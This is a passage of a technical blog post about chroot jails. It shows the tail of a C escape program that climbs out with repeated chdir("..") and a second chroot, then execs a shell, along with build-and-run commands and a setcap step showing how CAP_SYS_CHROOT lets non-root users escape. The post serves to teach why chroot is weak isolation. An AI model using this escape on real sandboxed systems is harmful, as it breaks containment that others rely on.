class="k">for</span><span class="p">(</span><span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="mi">1000</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span
class="p">)</span> <span class="p">{</span> <span class="n">chdir</span><span class="p">(</span><span class="s">".."</span><span class="p">);</span> <span class="p">}</span> <span class="n">chroot</span><span class="p">(</span><span class="s">"."</span><span class="p">);</span> <span class="k">return</span> <span class="n">execl</span><span class="p">(</span><span class="s">"/bin/sh"</span><span class="p">,</span> <span class="s">"-i"</span><span class="p">,</span> <span class="nb">NULL</span><span class="p">);</span> <span class="p">}</span></code></pre></figure> <p>The exploit seems to rely on a behavior of <code class="language-plaintext highlighter-rouge">chroot</code> which lifts the restrictions of the current chroot environment once a new one is created, so if we keep a reference to a directory from the first chroot, it’s possible to climb up to the root directory of the original process.</p> <figure class="center_children"> <img src="https://www.kuniga.me/resources/blog/2021-04-19-chroot-jail/escape.jpeg" alt="Men looking through a tunnel: scene from Shawshank Redemption" /> <figcaption>Scene from <i>Shawshank Redemption</i></figcaption> </figure> <p>Before doing the chroot, we compile and add the binary to the chroot target directory:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">./setup.sh gcc <span class="nt">-static</span> escape.c <span class="nt">-o</span> <span class="nv">$HOME</span>/root/escape <span class="nb">sudo chroot</span> <span class="nv">$HOME</span>/root/ /bin/bash</code></pre></figure> <p>Inside the chroot:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">./escape <span class="nb">ls</span></code></pre></figure> <p>which should display the contents from the original process.</p> <h2 id="chroot-for-non-root">Chroot for non-root</h2> <p>By default, the chroot process has root privileges, but it’s possible to start it as a specific user and group, so that we can
restrict what operations can be performed inside the chroot. For example, if <code class="language-plaintext highlighter-rouge">test_user</code> is a user we want to create a chroot for, we can do:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash"><span class="nb">sudo chroot</span> <span class="nt">--userspec</span> <span class="s2">"test_user:test_user"</span> <span class="nv">$HOME</span>/root/ /bin/bash</code></pre></figure> <p>The problem is that since the owner of <code class="language-plaintext highlighter-rouge">$HOME/root/</code> is not <code class="language-plaintext highlighter-rouge">test_user</code>, they won’t be able to do anything. We can create a <code class="language-plaintext highlighter-rouge">home</code> folder for them:</p> <p><code class="language-plaintext highlighter-rouge">setup.sh</code>:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">... <span class="nb">mkdir</span> <span class="nt">-p</span> <span class="nv">$NEW_ROOT</span><span class="s2">"/home"</span> <span class="nb">sudo chown </span>test_user:test_user <span class="nv">$NEW_ROOT</span><span class="s2">"/home"</span></code></pre></figure> <p>We then generate the <code class="language-plaintext highlighter-rouge">escape</code> binary in the new home:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">./setup.sh gcc <span class="nt">-static</span> escape.c <span class="nt">-o</span> <span class="nv">$HOME</span>/root/home/escape <span class="nb">sudo chroot</span> <span class="nt">--userspec</span> <span class="s2">"test_user:test_user"</span> <span class="nv">$HOME</span>/root/ /bin/bash</code></pre></figure> <p>Inside the chroot:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">/home/escape <span class="nb">ls</span></code></pre></figure> <p>Since <code class="language-plaintext highlighter-rouge">chroot</code> requires root privileges, they won’t be able to break out of the jail using the
<code class="language-plaintext highlighter-rouge">escape</code> binary, so <code class="language-plaintext highlighter-rouge">ls</code> should still show the jailed directories.</p> <h2 id="cap_sys_chroot-capability">CAP_SYS_CHROOT capability</h2> <p>There’s a more granular permission model than root, called capabilities. It’s possible to grant capabilities to binaries so they can perform operations even without root privileges.</p> <p>One of them is the ability to run <code class="language-plaintext highlighter-rouge">chroot</code>, the <code class="language-plaintext highlighter-rouge">CAP_SYS_CHROOT</code> capability. We can add it to our smuggled binary.</p> <p><code class="language-plaintext highlighter-rouge">setup.sh</code>:</p> <figure class="highlight"><pre><code class="language-bash" data-lang="bash">... gcc <span class="nt">-static</span> escape.c <span class="nt">-o</span> <span class="nv">$HOME</span>/root/home/escape <span class="nb">sudo </span>setcap <span class="s1">'cap_sys_chroot+ep'</span> <span class="nv">$NEW_ROOT</span><span class="s2">"/home/escape"</span></code></pre></figure> <p>Now <code class="language-plaintext highlighter-rouge">test_user</code> will be able to escape the jail even without root privileges.</p> <p>This makes it hard to detect whether there’s a vulnerability inside a chroot environment.
Hence it seems to be a general recommendation to not rely on chroot for security purposes [3].</p> <h2 id="code">Code</h2> <p>The full code for <a href="https://github.com/kunigami/kunigami.github.io/blob/master/blog/code/2021-04-19-chroot-jail/escape.c">escape.c</a> and <a href="https://github.com/kunigami/kunigami.github.io/blob/master/blog/code/2021-04-19-chroot-jail/setup.sh">setup.sh</a> is available on <a href="https://github.com/kunigami/kunigami.github.io/blob/master/blog/code/2021-04-19-chroot-jail">Github</a>.</p> <h2 id="references">References</h2> <ul> <li>[<a href="https://en.wikipedia.org/wiki/Chroot">1</a>] Wikipedia - Chroot</li> <li>[<a href="https://filippo.io/escaping-a-chroot-jail-slash-1/">2</a>] Escaping a chroot jail/1</li> <li>[<a href="https://unix.stackexchange.com/questions/105/chroot-jail-what-is-it-and-how-do-i-use-it#comment36_109">3</a>] Unix &amp; Linux: chroot “jail” - what is it and how do I use it?</li> </ul>Guilherme KunigamiIn this post we’ll study how to use the utility chroot to create a jailed environment. We’ll also cover some security holes with this approach.